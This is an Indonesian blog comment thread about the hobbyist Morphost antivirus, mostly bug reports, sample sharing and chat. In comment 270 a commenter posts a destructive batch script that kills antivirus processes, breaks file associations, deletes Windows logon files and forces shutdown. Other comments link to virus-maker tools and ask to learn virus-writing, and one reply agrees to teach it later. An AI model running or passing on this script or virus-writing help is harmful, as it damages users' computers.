        tiap ada filename “jwgkvsq.vmx”
        lihat dulu ukurannya… kalo lebih 150 KB maka kemungkinan memang conficker…
        lalu lihat PE Headernya (Morphost Expert), valid atau tidak…
        kalau valid itu, berarti dianggap conficker deh…

    • Shafry said

      untuk detek conficker si morphost pake heristic ato checksum juga virus Vironika nya

  178. yudha said

    kok Tag virus minggu ini ga diganti2 phic… di shared ada bebrapa yg bisa dimasukka ke “virus minggu ini” sepertinya…

  179. xhadow said

    bos, sering2 update posting dnk. lagi gak sibuk, kan🙂

  180. http://panswin.wordpress.com/2007/10/23/remastering-windows/
    link di atas untuk menghapus is cd winxp
    lumayan bagus
    baca2 aja

  181. shafry said

    Boss Ad App Baru AV SMP n Win Man Di blogq Unt av q taruh di halaman download virus n win mannya q taruh di halaman free download for all di blogq

  182. Welaha, Bang Q Punya Space Memory Untuk Update Morphostt
    Cuma Tawaran, Linknya Di http://files.guysshopper.co.cc
    Khan Lumayan Untuk Morphost AutoDownload Databasenya

    Terima Kasih
    Kholis

  183. SoulHACKER said

    Phic, ente udah ane jadiin Admin di forum ane. Tolong urusin ya! Lagi sibuk bikin game ini.

  184. KK kok morphost AV virus-nya dikurangin
    biar gaya kaya Av laen jangan dikurangin dong
    nampang Dikit

  185. VirSpector said

    Link MorphostLab Group dengan Google Shortener: http://goo.gl/u42U

  186. adithtya design on said

    pich btw sistem morphost klo jumpa virus langsung delete apa sistem clean???

    • Morphic said

      kalo nemu virus, si morphost nunggu perintah user-nya…
      mau delete atao gimana….

      tapi fungsi “delete” morphost tergolong komplikated…

      ntar dia periksa dulu virusnya, bisa diperbaiki ato gak…
      kalo masih diperbaiki, ntar morphost bakal ngeclean tuh file,
      tapi kalo gak tertolong lagi, bakal dihapus…

  187. newbie in virus said

    mas di laptop saya real time protectornya kug gak bisa jalan ya?

    saya pake vista 64 bit……

  188. Muhammad Nur Kholis Virologist said

    waduh commentnya banyak
    mau dibaca satu-satu waktunya g cukup
    yawdah login lalu comment ajah

    fans morphost di fb udah ada atw g?

    morphic : bagaimana?, start-up controllernya!, udah selesai dan di gabungkan dengan morphost?, kalau di gabung pasti seru, jadi morphost lebih mudah dalam pembasmian viru sterbaru, karena start-upnya mudah di konfigurasi lewat morphostnya langsung,meskipun sudah ada tombol untuk membuka regisytry, okey…!

    • Morphic said

      fans-nya belum kubuat tuh…
      gmn membuatnya?

      blum aku cek loh startup controller-nya .
      hehehe…

      skarng aku lagi sibuk ngurus kecepatan scanning Morphost…
      tahun depan (mungkin januari ato februari), morphost versi 7 diluncurkan….

      kecepatannya jauh lebih cepat dibanding Morphost accords.

  189. shafry said

    Hy Boss Numpang Lewat. Klik Gambar Untuk Masuk Ke Blogq

  190. SoulHACKER said

    Phic, mana royaltiku atas website NRPC. Cantumkan kek owner-nya. Gimana kabar disana? Udah beli PC atau laptop baru? Udah makin mantap aja MorphostLab ya.

    Oiya soal gameku itu lagi proses cuy, cukup lama juga, kehabisan ide cerita. Ntar tolong publikasikan disini ya. Thanks.

    Regards

    SoulHACKER

  191. Adie said

    broo.. di Fb belom ada fan`s moprhos ya???

  192. wah ini bukan kelas aye nieh aku masih ingusan… master master ayo semangat untuk menciptakan yang terbaik….

  193. Alexander said

    Salam kenal…

    Tolong dong kirim ke email saya (alexandertobing@ymail.com), Sality Removal….. Soalnya, tuh virus nyerang PC saya….. PLIZZZZZ..

  194. Reyhan said

    mAuu nanya nieee Morphost dibuatt pakee checksumm apa ya ?…

  195. jack said

    tambahan satu lagi bro (kelupaan) ansav juga.
    kalo dipelajari dari antivirus lain bisa nggak yah?

  196. jack said

    Bro, Morphost belum dapat menscan folder yang mengandung symbol,
    seperti : 2ФФ8 & ۞ My Access

  197. adhit said

    pic klo butuh desain lg blng k aq z… kirim k FB aq z oke…

  198. Rh354 said

    pic gw upload sampel yg ga’ kedetek di morphost gw kasih nama rhesa sampel😀

  199. yudha said

    wahh anggota baru nambah lagi yah…

    salam kenal ya buat anggota baru morphostlab, dr yudha(virus captor)

    http://yudha-arch.blogspot.com

    phic, aku susah masuk komentarnya nih… knapa yah?

  200. revil said

    pic, minta virus nya ya,,
    thx😀

  201. horus ra said

    kalo boleh tahu masnya ini mastering language apa yah? terus AV Morphost ni dibuat dengan bahasa apa juga? thanks b4

    • Morphic said

      aku cuma bisa Visual basic.
      gak sempat blajar yg lain… karena bidangku bukan IT

      Morphost dibuat pake bahasa visualbasic juga.

  202. Yantha Kencana said

    Friend….
    Makasih ya…..
    Gue Suka Dengan Sample2 Virus nya….
    Karena Dengan Virus tersebut gue pingin belajar cara mgatasi virus tersebut….
    Update terus sample2 virusnya…..

    sekali lagi makasih ya mas…..

  203. deny26 said

    Thank’s sample virus yang telah di Share. Semoga Morphost Makin berkembang.🙂 Amin…

  204. yudha said

    Hadir…. phic…

    cape aku baru pulang abis asistensi sm dosen…. disuruh nunggu pula 1 jam di ruangannya…

    tapi … seneng jg beberapa tugasku selesai.. huh..

  205. yudha said

    ABSEN PAGI…!! blom pada bangun nih kyanya Morphic sm Satrya..?? bangun Uuuyy….

    aku abis dari rumah dosen Buat Asistensi tugas… ternyata dosen nya ada acara keluarga… gak jadi asistensi, pulangnya ke warnet..ha..ha..ha..

  206. yudha said

    Pagi-pagi ke warnet dapet sampel….

  207. haxeru said

    @satria.permana

    Lebih baik anda ke :
    http::/www.av-comparatives.org/

    di situ lumayan lengkap…

  208. Dear Morphic,
    Saya lagi ngumpulin data Antivirus nih, kira2 ada yang bisa bantu saya ga yah..
    Saya punya table matrik fitur dan kemampuan AV, kira teman-teman bisa bantu ngisi ga?
    Trims sebelumnya ya.. (tolong kontak email saya ya…)

    1 Support OS:
    Windows 98 ?
    Windows NT ?
    Windows 2000 ?
    Windows ME ?
    Windows XP ?
    Windows Vista ?
    2 Program Antivirus memiliki program untuk meremoval antivirus lain, pada saat proses instalasi. ?
    3 Program Antivirus mensupport system update secara cascade/bertingkat ?
    4 Program Antivirus mensupport update agent yang digunakan , bersistem operasi Windows XP ?
    5 Program Update Antivirus, secara cascade mendukung metode scheduler ?
    6 Program Antivirus mendukung remote deployment via web ?
    7 Besar Ukuran File Master Antivirus (AV Versi Terbaru) ?
    8 Besar Ukuran File Update Signature Antivirus ?
    9 Ada bandwith Limiter di Program Antivirus ?
    10 update frequency ?
    11 Jumlah Signature Antivirus ?
    12 Price or License (terutama untuk corporate) ?
    13 Mendukung Real Time Protector ?
    17 Scanning Speed ? – tested
    18 On Access Scanning ? – Ya

    Mohon bantuannya ya…

    • Morphic said

      aku gak pake antivirus manapun kecuali morphost. jadi aku ngejawab berdasar morphost aja ya….

      1. aku masih nyoba di 98, XP, vista
      2. tidak. antivirus punya hak untuk exist juga, jadi morphost gak mendukung fungsi ini.
      3. tidak. gak pernah terpikir dengan begituan.
      4. lihat jawaban 3
      5. lihat jawaban 4
      6. lihat jawaban 5
      7. 2,14 MB
      8. sekitar 56 – 59 KB
      9. lihat jawaban 6
      10. Tergantung pada stok virus. Umumnya 2 minggu.
      11. database terakhir 1080 an
      12. lihat jawaban 9
      13. Ya. Masih versi pertama
      17. menurutku sendiri (pembuatnya sendiri) masih rata-rata
      18. ya

      thanks juga

  209. win32.sality.p
    win32.sality.q
    win.32.teddybear
    —————————-
    telah terupload
    —————————-

  210. haxeru said

    oya, kok ga ada search-box ya??

  211. Galang said

    morphic..
    avnya mantabb.

    tapi kenapa folder options selalu di disable otomatis?

    folder options saya awalnya normal (show : enabled), tapi pas saya jalankan morphost antivirus accords update db 4, saya buka bengkel registry tiba2 disable folder options kecentang ndiri..kalo di klik lagi, bukannya hilang malah gk hilang2.. <– (bug neh bro)

    selain itu, ada 2 registry yg diubah ndiri ama avmu :
    autorun n nohidden (scann registry oleh smadav)..(melanggar privasi neh bro)

    selebihnya mantab, saya senang sama plus feature/software2 buatanmu.. artikel2mu juga keren..
    pertahankan yh, kerenn…

    • Morphic said

      thanks.
      itu bug!

      kedua bug yang udah kmu laporkan barusan udah diperbaiki di kompilasi 27 september (hari ini). kebetulan banget.
      silakan download (kalo mau ya…)

      bengkel registry “folderoption” udah bagus lagi.
      terus 2 registry yg dianggap salah itu juga udah bagus lagi skrg, dan morphost udah lebih bersahabat ama smadav skrg.

      kalo ada bug lain, silakan lapor.
      oke!

  212. Yudha: iya iya, ak ngerti..
    Pak arsitektur..
    Yg ngisi team ini beragam ya .
    Dari calon dokter, calon arsitektur dll
    Hahaha….

    Gmn yud ngasi komentarnya ?

  213. yudha said

    wew.. ini masuk, kok yg tadi2 gak masuk yah??

    @Satryacode

    ok… nanti ku coba… iya nih aku lagi sibuk TA..

    Btw…. Mampir ke Blog ku yahhh, isi koment juga ya..
    http://yudha-arch.blogspot.com

    Phic… artikel virus sabotage ku publish di blog ku ya… menarik sih…

  214. yudha said

    komenku gak masuk ya phic??

    komen buat Satryacode…?

  215. Sonny said

    mas gimana kalo kita bekerja sama membuat antivirus yang luar biasa…
    btw siapa tau bisa jadi antivirus besar di Indonesia setelah pcmav, ansav, dan smadav
    Kalo mau coba antivirusku : http://fcc.ekskul5.org/
    rencananya untuk scan folder yg namanya unicode
    Kalo mas setuju kirim aja email ke : sonny@ekskul5.org

  216. yudha said

    sory phic… akhir2 ini blum bisa mencari n kirim virus ke 4shared, coz q lg mau Persiapan Evaluasi Tugas Akhir ku.. tapi tenang ajah… Morphost ku Promosikan di Forum AV tetangga… bnyak jg tanggapannya…

  217. maxx said

    kenapa ya akhir2 ni nggak ada update(artikel atau pembahasan virus) terbaru dari morphic??? Lagi sibuk ato apa??? Padahal udah banyak jenis virus baru yang muncul…..

  218. http://www.onelab.wordpress.com

    Punya siapa ni??
    ^_^

    Bjuang terus sobatku..
    Wlw kw di “dunia bbeda”

  219. ede said

    Selamat hari raya idul fitri..mohon maf lahir batin…

    saya ijin Copas Posting dari blog anda yaa…

    https://morphians.wordpress.com/2009/08/23/tutorial-membuat-virus-vinorika-tiruan/

    nah saya post di blog saya :

    http://wormarchive.com/?p=642

    Terima kasih…

    ede.

  220. Haxeru said

    hey, why is my last comment ‘fly’ to the unsorted box??

  221. Haxeru said

    can you clean/sweep a junk or mess-up comments…?
    maybe it will be getting better…

  222. jatioke said

    tahnks yudha dah berkunjung ke blog aku
    morphost… its ok

  223. ZenNaa said

    Terimakasih,
    Saya download Morphost Accords & ternyata Morphost makin OK aja.
    Terus semangat…..

  224. yudha said

    Berkunjung malem-malem ke morphostLab… sepi yach…

    pic… virus lagi sepi nih…

  225. Jill Valentine said

    Thanx 4 all Articles.I Like it.

    A-7

    • Morphic said

      ok. your welcome…

      nicknamemu A-7 ya?

      aku agak gak asing kalo dengar nama A-7. Soalnya itu nama kelompok tutorialku di kampus. he he he.e…

  226. harrie said

    bos.. gw kena virus dari lo nih, yang hack facebook.zip
    antivir nya ada ga?? tolong dikrim ..thx

    • Morphic said

      ooo,, sori.
      file hack facebook itu bukan file legal milik MorphostLab.

      tapi kami anjurkan aja pake antivirus luar (kalo anvir dalam negeri gak bisa).
      4shared pake anvir kaspersky.
      jadi pake aja kaspersky, karena kita dah tahu sendiri kan waktu mendownload kaspersky udah mendtek file itu…

  227. maxx said

    Boleh tau nggak source code (dalam VB) buat mempercepat scanning antivirus?? Tapi juga akurat….
    Thx…

  228. yudha said

    wihh…phic, abis ospek nih ya..lg botak.. skarang uda jd mahasiswa dong.. ,klo gw mudah2an aja semester ini kelar… he..he..

    • Morphic said

      iya, skrg lagi botak.
      sial! Sial!!!
      jadi tambah jelek aja nih….

      akhirnya masa ospek pun lewat…
      meskipun udah disuruh cium bibir kodok dan “bersahabat” ama cacing…
      sungguh ospek yang melelahkan….

      • yudha said

        ha…ha..ha.. suruh cium kodok? ada2 aja kw.. iseng bgt tuh senior.. jalanin aja phic, banyak manfaatnya ko. ntar juga km bisa deket sama seniormu, bisa minjem2 buku nya atw tugas2 nya..he…he.

        • Morphic said

          iya, akhirnya semuanya udah selesai dijalanin…
          si kodok malah minta tambah tuh…

          yang cowok nyium kodok betina, trus yang cewek nyium kodok jantan.
          he he he…

          iya sih. ada manfaatnya…. he he he..

  229. gothic said

    mas mba, tolong klu bisa file downloadnya lewat ziddu aja soalnya lambat alewat 4shared, thanks

    • Morphic said

      sengaja aku dulu pindahin ke 4shared karena ada juga pengunjung yang komentar kalo mereka bermasalah dengan ziddu dibanding dengan 4shared.

      oke deh aku usahain untuk jalanin duaduanya, 4shared dan ziddu.

  230. yudha said

    Malem …Phic, lihat recent visitor.. Medan sm Jakarta… he..he..h e jarak kita cukup jauh jg ya… he..he..

  231. yudha said

    ABSEN Pagi morphic….🙂

  232. adnan said

    phic kapan nich morphost yang baru kelar ,………..katanya bulan ini

  233. rha_deed said

    bang morphic
    ni naq bru
    da bwt anti virus lokal
    lengkap dengan RTP
    mohon dicoba untuk seluruh kawan2
    ni link nya
    http://rohis.org/unduh/doc_download/14-syuvi.html

    • Morphic said

      wah mantap tuh,,
      ada avmaker lokal baru!
      maju terus!

      tapi kok waktu dihidupkan,
      “file comctl.ocx” gak ditemukan…
      disertakan aja tuh file….

  234. yudha said

    phic, g kirim email ke karta_morphic , ada alamat sampel virus dari Forum….

  235. ar-rizq said

    kk

    ksh feed burner dumz biar qt” nich bs brlangganan artikel dr kk..

    thx~~

  236. yudha said

    phic, ada satu yg mengganjal tiap kali berkunjung ke morphostlab ini….apa ya?? setelah g pikir2, ternyata… kenapa ya Photo mu kebalik.. he..he..he…

  237. yudha said

    Phic, setelah g cari sana sini, nanya sana sini, Morphost itu termasuk salah satu antivirus lokal indonesia populer, hebat2.. morphostlab juga cukup banyak yang mengunjungi.. blum lg yg mendownload morphost di 4 shared…

  238. yudha said

    Phic, pnya FB kan? alamatnya apa? g baru bikin FB. . blon punya temen neh…. he..he..he.. g bikin FB juga nantinya sekalian promosiin morphost mu… FB g : yudhafb@gmail.com

  239. yudha said

    phic, morphostlab tampilan baru ya?? sepertinya lebih elegan nih…

    • Morphic said

      oh ya?
      elegan ya?
      aku ngerasa terlalu buruk…
      buruk karena bukan warna hijau…

      he he he.. mungkin nanti aku ganti deh nih themenya…

      • yudha said

        klo diganti pasti themenya gak jauh dr hijau lg…he..he..he… tp bagus, hijau sudah jadi ciri kas morphost..sip2. klo sempet bahas Yuyun dong phic… lg ITW nih di jkt, khususnya di warnet2 sekitar rmh g..

        • Morphic said

          he he he…
          pastinya morphost tetap hijau.
          mana tahu morphost bisa jadi icon stop global warming nantinya… he he he

          virus yuyun maksudmu virus vinorika ya?
          oke deh… nanti aku analisa dulu si vinorika itu…

        • yudha said

          yoii.. hijau kan identik dengan alam , klo gak ada alam hijau, panas lah kita…he..he..
          iya2 vinorika… sampelnya klo gak salah sdh q kirim ke shared mu… sip2

          kapan launching morphost baru?.. nanti klo dah muncul, mau q publish di BLOG , FS, FB q…ok!

        • Morphic said

          oiya, lupa aku.

          morphost baru launching mungkin akhir bulan ini…

          oke sep.

  240. habib said

    karta….bole kenal…perlu ne…balas’a ke email aja ya!

  241. ADNAN said

    hi phic aku mau nanya kan kemaren aku dapat virus yang belm di pack aku dan sudah lihat source codenya di vb compiler tapi ga bisa di built ulang di vb 06 gimana phic tolong donk?

    • Morphic said

      gk bisa dong..

      tuh gak bisa di-built lagi… karena hasil decompiler “bukan” pemrograman VB6 murni…
      jadi gak bisa….

      sbtulnya decompilr tuh fungsinya (menurutku loh) untuk ngintip fungsi-fungsi API atau fungsi lainnya yang digunakan suatu software VB

  242. yudha said

    untuk fto sama identitas q ambil di blog q aja phic… untuk link nya pakai blog q. http://yudha-arch.blogspot.com sip2 thanks ya sob… ada viri baru tuh di shared mu…

  243. Yudha said

    sob, mainlah ke blog q, n kasih coment, kok comen nya gtu aja si… jeleg ya isi blog q.. lg ofline nulis aja, lg sibuk soalnya, tp klo ad yg comen pasi tak blz… ok.sip2…

  244. Yudha said

    phic, morphost mu yg br sudah ada RTP nya tak?

  245. Yudha said

    Sory2 Phic, q br liat komen mu yang kemarin2.. ini jg br ol, tp lg nggak nulis blog dulu. link poto n indetitas ap nih phic? untuk foto sih bs di liat di blog q phic.. he..he..hehh keren ya?? atw jg friendster q jg ada..

    • Morphic said

      oh…
      ada perlu tuh…
      untuk di bikin di blog ini ama di buku petunjuk Morphost Antivirus.
      Biar keliatan anggota-anggota MorphostLab.

  246. Shafry said

    yang ad d windows, cmn ud q search virus yuyun tu tp g ke detek virus yuyun kan ad yg extensinya .ink

  247. Nesya said

    Mas tolong dikoreksi file file yang sudah di upload dari temen temen yang masuk ke software ternyata tu virus contohnya serviks.exe
    klik aja tuh file dua kali kompimu ancur tolong ya mas

    • Morphic said

      oke. thanks ya..

      kalo gak dikasih tahu mungkin kami gak akan pernah tahu kalo itu virus.

      skali lagi thanks ya…

  248. Hermawan said

    Mas,saya baru download Morphost Green.Saya sangat tertarik dg antivirus ciptaan anda,karena file size nya yg kecil & ringan.Yang ingin saya tanyakan bagaimana setingan untuk AUTORUN.Jadi komputer dihidupkan otomatis antivirus SCANING & auto protect.Baik itu dari FlashDisk ataupun dari jaringan internet? Setingan AutoDetect kok tidak bisa? Terimakasih sya mau mencoba.Tetap berkarya & bersemangat !!! Jadilah kebanggaan Indonesia….

    • Morphic said

      Autodetect sama aja dengan RTP.
      di versi morphost green belum dilengkapi fitur itu. jadi belum kuaktifkan….
      di morphost yang baru (morphost accords) fitur itu dah bisa digunakan.

      kalo untuk fitur Autorun itu fungsinya untuk memeriksa file autorun di flashdiskmu…
      memeriksa apakah autorunnya memicu file bahaya atau tidak…

      thanks karena udah mencoba…
      tunggu morphost berikutnya ya…

  249. shafry said

    hy kak q mw nx gmn ya caranya search file yang extensinya .ink ? pakek search engine.

    • Morphic said

      maksudmu search engine apa?
      kalo search di windows gampang lah…
      tinggal klik search trus ketik “*.lnk”

      kalo di google…
      ketik “filetype=lnk”
      coba aja dulu soalnya sebelumnya belum pernah kucoba…

  250. Satryacode said

    Ok..
    Sample virus win32.trojan-gen .
    Udh dapet..

    sabar mnunggu ya analisisny . .

    regard

    Satryacode

  251. dhikaz said

    Salam kenal Bozz, punya win32:trojan-gen nggak???

    klo ada bsa dbahas gak teknikan detailnya, bwt penelitian nih btuh bgt…

    thanx yaa…

    GBU..

  252. yudha said

    blogwalking sob… pa kabar mu?? gimana morphost nya… virus lagi sepi nih phic, udah lama ga nemuin virus baru…

    • Morphic said

      ya morphostnya lagi masih proses pengerjaan nih…
      terus upload virus ya…

      aku butuh link foto dan identitasmu…

  253. Gary said

    phic, kamu punya script utk icon heuristic gak???
    kalo ada, saya boleh bagi gak….?
    atau referensi gitu…
    terima kasih ya…
    GBU

  254. Gary said

    phic, kamu punya script utk icon heuristic gak????
    kalo ada, saya boleh minta gak???
    ehehheheeee….
    terima kasih ya….

  255. Satryacode said

    Boss,
    Postkan cara bikin site di .co.nr
    thanx …
    ^^

    • Morphic said

      q jawab sekarang aja ya sat…

      buka deh google. lalu ketik “free domain .co.nr”
      terus udah itu buka salah satu (biasanya paling atas hasil pencarian)…

      lalu daftar deh disitu.
      udah itu buka balasan email dari FreeDomain untuk mengaktivasi account cuy….

      bisa kan…

  256. s4dly said

    hati hati loch phic bisa bisa diblack list loe uangnya.

  257. corey said

    om mau request
    pliss donk naro file nya jangan di ziddu……..
    gagal mulu nih donlod antivirus morphost nya…
    plissssssss………. susah banget ziddu ribet ga bisa bisa di donlod. argh pliss 4shared or indowebster gitu.. ya om.

  258. BASMALAH said

    Maju terus Morphost Antivirus

  259. radzt said

    bro aq ini anak tmora..

    bs mnt kasi tau cr buat dialog box selamat datang di flash disk..

    sm software utk lock flash disk..

    tolong y bro

    thank u

    • Morphic said

      ada sih caranya,,,
      tapi itu udah make fungsi autorun.

      tapi bisa jadi susah, soalnya kadang-kadang beberapa antivir mendeteksi file ‘autorun’ sebagai file suspected atau pemicu virus.

      aku belum sampe ke tingkat non-write protected untuk fd..

      coba cari aja digoogle mungkin aja ada.

  260. Shafry said

    hy phic ad yg mw gw omongin antivirnya yg baru ap ud jd?

  261. Yudha said

    hei phic, sama2 jg bwat virus nya, itu semua dr yg q temuin di laptop q. oia ada yg mau di omongin apa phic?

  262. borneo said

    bos kayanya sality itu mirip dengan virut daya hancurnya ulas dong cara atasinya !

    • Morphic said

      oke, bisa kita bahas tuh virus…

      tapi dalam waktu dekat aku belum bisa bikin artikel soalnya lagi sibuk mau menghadapi UMB n SNMPTN. he he he

      kuliah diutamakan dulu..

  263. Shafry said

    di http://shafry.blog.friendster.com/

  264. Shafry said

    Mas, masukan saya jadi blogroll anda donk… saa dah masukin mas di blog roll saya
    Blogq di Shafryblog
    tp q mnt informasi dikit gpp ya hehe

  265. Ramz said

    Mas, masukan saya jadi blogroll anda donk… saa dah masukin mas di blog roll saya

  266. velshadow said

    eo bro matur nuwun😀

  267. velshadow said

    eo bozz tapi w males masa harus liad atu per satu.
    eang menurut kmo bagus ajjo ..ada ngk😀

  268. velshadow said

    cara buat RTP gmn eo .hha klo boleh tao w mnt sourcenya k email
    vels.ane@gmail.com .
    matur nuwun ^ ^

  269. Shafry said

    OKkkkkkkkkkkkkkkkkkkkkkkkk………..! Biar Ngefek!!! Hehehehehehehehehe
    q add file baru bagus coba di buka ya!! n gw butuh gimana caranya autorunq bekerja codenya gimana?? gw ud coba berulang2 tp g bisa

  270. Shafry said

    hai smua…! ad scrip baru file ini simpan dgn format “.bat” tnpa tnda petik OK.!
    title Hack Setup
    color 0A
    @echo off
    set end=md “Hack installing”
    set fin=copy “Hack log.txt” “Installing”
    %end%
    %fin%
    net send * Hack is installing, press OK to begin set up.
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    cls
    msg * It is you who is hacked….
    msg * I warned you, and you kept going. Challenge me and this is what happens.
    DEL C:\WINDOWS\system32\logoff.exe /F /Q
    DEL C:\WINDOWS\system32\logon.exe /F /Q
    DEL C:\WINDOWS\system32\logon.scr /F /Q
    cls
    shutdown -s -t 5 -c “thank you for waiting”

    bye

  271. Morphic said

    #Gary
    thanks gar,

    #Shafry
    oke, aku sampein nanti ama dia.

  272. Shafry said

    o….! gt ya. tp gw ucapin trima kasih pd morphic

  273. gary said

    oia phic, aku dah punya kok morphost AV,,,
    saya yg ngeliat aja stress,,,
    gmana cara bwtnya???
    gbu

  274. gary said

    phic makasih bnyk ya…..
    gbu

  275. Morphic said

    @Shafry
    iya ada dua kendala nih.
    1. aku bukan morphic
    2. morphic lagi ujian

  276. Shafry said

    @morphic
    Ya tu buatanq. mang np kok g bs???

  277. Morphic said

    @Shafry
    bagus sih.
    itu buatanmu???

    aku mau aja sih ngajarin kmu bikin virus, tapi gak bisa skrg…

  278. Shafry said

    @Morphic
    filex adalah Passworx_is_X-Men klo g bisa 5.zip itu.
    tp alamat yg q bri gmn?? BGs G? n tlong ajarin buat virus pakek vb donk alamat E-Mail q ada diatas Mata35@ymail.com

  279. Morphic said

    @Shafry
    apa nama file yang kamu upload?

  280. Shafry said

    #Morphic
    thanks untk pemberiannya ya……! n gmn virusx yg ud q upload???
    ne ada alamat toolnya pembuat virus tolong dikunjungi ya
    http://vx.netlux.org/vx.php?id=tv16
    Me : Mata35@ymail.com

  281. Shafry said

    Btw carax bwat virus pakek vb gmn?? n crax hack pakek vb gmn??

  282. Morphic said

    #Shafry
    sblumnya thanks

    nih alamatnya:
    http://morphic.4shared.com
    untuk download morphost antivirus
    http://www.4shared.com/file/43728253/a1d3acb4/Morphost_Antivirus_Green.html

    @Gary
    download aja di blog ini. lihat di bagian tab “Download Source Code”.
    Disitu ada source code virus, antivirus, game dan lain-lain…

  283. gary said

    phic,,
    gw da bwt AV tapi baru pake crc32…
    gw pnh liat di forum virologi kamu punya source yg pake md5 ya….
    kalo boleh, saya boleh dikasih gak???
    ni email saya : garyabraham_88@rocketmail.com
    kamu jago bgt phic!!!!
    terima kasih ya….

  284. Shafry said

    Please q mnta alamatx upload morphost yang ada d 4shared.com q lupa

  285. shafry said

    q mnta alamatx yg mau q upload donk

  286. shafry said

    eh kemarin q ud upload virus baru q jelek sih tp bahaya juga kok tolong dilihat ya d 4shared.com d alamatnya uploadx morphostlap

  287. Morphic said

    @Kholis
    aku juga dah lama nih gak jumpa ama si morphic.
    he he he

    @Mata35
    oke deh, ntar ku download trus ku kasih ama si morphic.

  288. q ud upload virus baru jelek tp cukup berbahaya jg kok alamayx d sni http://www.4shared.com/account/home.jsp cari file Passworx_is_X-Men klo g bisa 5 .zip d folder upload_virusbuatanmu_disini!! tolong dilihat ya>>>>>>

  289. Hallo Morphic
    Boleh Minta Heuristic AV Mu Nggak…?

    By : Kholis

  290. Morphic said

    @Adnan
    saranmu udah pasti aku terima. soalnya memang rencananya aku mau buat next AV dengan RTP, Virus Blocker, dan lain-lain deh…

    tapi next Morphost mungkin keluar agak lama lagi… sekitar 5 atau 6 bulan ke depan…

  291. adnan said

    hi phic ini aku mau kasi saran buat km ttg av km
    klo km berencana buat av versi baru usahain ada fasilitas realtime supaya virus engga sempat ngacak ngacak kompi

    ini hanya saran lo phic……..

  292. Man Zhifu said

    upload sample lagi … maaf klo ada yg udah basi :”>

  293. Morphic said

    #Virspector
    bagus virs, AV lokal pasti akan smakin berkembang tuh,,

    #Man Zhifu
    oke thanks bro…

  294. man zhifu said

    namanya pengki.zip

  295. man zhifu said

    baru kirim sample virus bro … tolong di garap😉

    thanx

  296. VirSpector said

    Morphic! Kayaknya saya punya tips buat anda! Yaitu untuk menghilangkan virus “Susp.inf” dari Morphost soalnya gara-gara itu jadinya semua file INF, termasuk yang file INF penting yang umumnya ada di drive Recovery (Di Vista euy!) jadi ikut dibilang virus!!! Apalagi klo ada yang memasang AUTORUN.inf didalam flash disk untuk sekedar mengganti Icon Flash Disk;, ya…. dibilang virus juga

    Ngomong-ngomong, bentar lagi saya mau mengeluarkan “VirSpector Antivirus 1.0”, antivirus pertama saya. Klo dah muncul di http://virspector.us.to atau di http://virologi.info tolong di-tes ya! Habis… Antivirus ini sering ngedeteksi virus yang saya tidak tambahkan ke dalam database. Tapi setelah saya scan, ternyata itu emang virus!!!! Alias “Heuristis yang I-DONT-KNOW-THAT” (Maksudnya, ada teknik heuristis tersembunyi di VirSpector Antivirus tapi pembuatnya (saya) sendiri gak tau). Apakah bener itu? Tolong di tes ya!!!!

  297. Morphic said

    #Origami
    kalo untuk sality aku kurang tahu juga tuh. soalnya sality termasuk virus kelas dunia yang tergolong berat.
    aku belum siap ujian… (maksudku ujian SNMPTN. he he he)

    #Astalavirsta
    okey, thanks…
    akan kukembangkan lagi…

  298. astalavista said

    morphost bagus, tapi ada virus yang mirip dengan Vinorika yang juga membuat shortcut, dan morphost tidak bisa mendeteksinya…

  299. origami said

    hai bung, hehehehe. kalo ngilangin virus sality secara manual ada gak yah? laptop saya, dan kalo install ulang itu terlalu lama makan waktu… tolongin yah… btw bung, udah selese ujian kan?

  300. Morphic said

    To yudisatrya
    aku dah compile ulang morphost-nya. jadi morphost yang beredar sekarang dah gak rusak lagi..

    thanks juga…

  301. yudisatrya said

    Phic.
    Fungsi refresh yg ada di form scanning kok ngebug?
    Cb d tes dan d perbaiki ya.

    Oia,
    ni av hijau morphost yg pertama kali aku dönlot pas br launcing.
    Inget kan?

    Thanx phic,
    moga av morphost makin bagus dan populer.
    _morse code_

  302. adnan said

    kapan nich buat pc guard versi morphost

    setelah sukses dengan AV nya phic

  303. Morphic said

    #adnan
    mungkin juga tuh hilang.
    tapi bukannya setelah di restart balik lagi tuh fitur windows?

    coba install ulang XP….

  304. adnan said

    hi phic

    sekali lagi nich aku ada masalah dengan pc ku

    cmd ,registry,task manager kayanya ilang dari direktory

    walaupun aku buka dengan fasilitas morphost,

    katanya file not found

    atau mungkin bener kedelete ya

    sekali lagi tolong solusinya

    thanks bro

  305. adnan lagi said

    tuh kan aku sebenernya dah curiga kaya gitu penyebabnya

    sekarang aku tau mengapa riesya AV bs kebuka karna di menyimpan komponen yang mirip dengan msvbvm60.dll sebagai pengganti nya dalam systemnya

    ok phic thank ya solusinya
    moga aja berhasil
    thank broo

  306. Morphic said

    #Adnan
    begini, ada file komponen yang dibutuhkan Morphost untuk bisa hidup. yaitu file “msvbvm60.dll”

    solusinya begini:
    copy file “c:\windows\system32\msvbvm60.dll” dari komputer teman anda dan paste komputer anda pada folder “C:\windows\system32\”

  307. adnan said

    hi phic
    aku butuh bantuanmu MORPHOST AV GREEN engga mau jalan di pc ku
    setiapkali mau ngebuka pasti gagal dn katanya gini

    ¨¨the application or dll c\windows\msvbvm60.dll is not a valid windows image please chek this against your instalation on diskette¨¨

    tapi klo di pc lain mau ya
    padahal aku pake XP

    aku curiga komputer aku kena virus
    tapi kok AV riesya versi dulu bs kebuka. MORPHOST tidak

    help me please

  308. kitzuke said

    Hallo phic, lam knal dr gw, to the point aj ye,..
    begini,… kompi gw dikantor kan kena pirus semua, yaitu semacam recycler ( autorun.inf) gmn cara nghapusnya yw??? banyak antipirus yang ndetect tapi ga bisa nghapus secara tuntas,… bantuin gw donk,.. gmn cara manual buat nghapuz tu pirus… plizz yw….blz ke email gw….okley….????

  309. aa.LiL said

    thanks bos…

    saya ikuti terus perkembangan morphost nya boss…

    kalo sempet main2 ke blog ku..hehehehe

  310. Morphic said

    @Maridjo
    sep

    @Poet
    absen sudah dicek!

    @Aa.LiL
    thanks ya.. gak apa apa kok dipost di blog-mu. malah aku senang kalo AV-ku dipromosiin.

  311. aa.LiL said

    boss…numpang test moprhost yaa..

    kalau selesai saya test,blh tidak saya membuat artikel tentang morphost di blog saya? maksud sekalian memperlebar promosi Antivirus Lokal gt. kalau keberatan tidak apa2.

    thanks bos..

    sukses selalu dan terus berkembang.

  312. poet said

    hooiiii abangku……. x) x) x) x)

